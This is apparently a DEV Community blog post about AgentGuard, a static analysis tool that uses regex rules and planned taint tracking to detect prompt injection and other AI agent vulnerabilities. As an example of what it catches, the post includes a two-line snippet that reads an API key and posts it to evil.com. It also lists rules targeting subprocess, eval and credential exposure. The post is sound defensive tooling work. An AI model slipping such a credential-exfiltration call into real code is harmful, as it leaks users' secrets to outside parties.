DEV Community

Cover image for Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities
Dockfix Labs
Dockfix Labs

Posted on

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.

The Regex Foundation

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

# ASI01: Prompt Injection
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)
Enter fullscreen mode Exit fullscreen mode

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

The Problem with Regex

Regex has limits. Consider:

# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
Enter fullscreen mode Exit fullscreen mode

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: AST-based semantic analysis.

The AST Layer (Roadmap)

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

  1. Identify sources: function parameters named user_input, query, message, request.body
  2. Track propagation: variable assignments, string formatting, list/dict construction
  3. Identify sinks: openai.chat.completions.create, prompt, messages, system
  4. Flag paths: any path from source to sink without sanitization

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.

Correlation Detection

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

# Line 1: Secret access
api_key = os.environ.get("API_KEY")

# Line 2: Network call
requests.post("https://evil.com/collect", headers={"Auth": api_key})
Enter fullscreen mode Exit fullscreen mode

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.

Future versions will extend this to full function-level taint tracking.

The OWASP ASI Top 10 Coverage

AgentGuard currently covers all 10 categories:

ASI Rule Detection Method
ASI01 Prompt Injection Regex (f-string, concat, format)
ASI02 Tool Abuse Regex (os.system, subprocess, eval)
ASI03 Data Exfiltration Regex + cross-line correlation
ASI04 Excessive Agency Regex (auto-execute, no-confirm)
ASI05 Supply Chain Regex (untrusted pip install, dynamic import)
ASI06 Insecure Output Regex (raw HTML, eval output)
ASI07 Credential Exposure Regex (API keys, private keys, passwords)
ASI08 Context Manipulation Regex (context stuffing, token bombing)
ASI09 Agent Loop Exploitation Regex (recursive calls, no depth limit)
ASI10 Trust Boundary Regex (mixed privilege, cross-agent calls)

Benchmark Results

The benchmark suite has 28 samples:

  • ASI01 (6 samples): 100% detection
  • ASI02 (5 samples): 100% detection
  • ASI03 (4 samples): 100% detection
  • ASI07 (6 samples): 100% detection
  • ASI10 (5 samples): 100% detection
  • Clean (2 samples): 0% false positives

What's Next

  1. AST-based taint tracking for Python and JavaScript
  2. Language support: Rust, Go, Java
  3. GitHub Code Scanning integration via SARIF
  4. MCP server mode for real-time scanning in AI coding assistants
  5. Semantic injection detection -- understanding prompt structure, not just string patterns

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.


AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.

Top comments (0)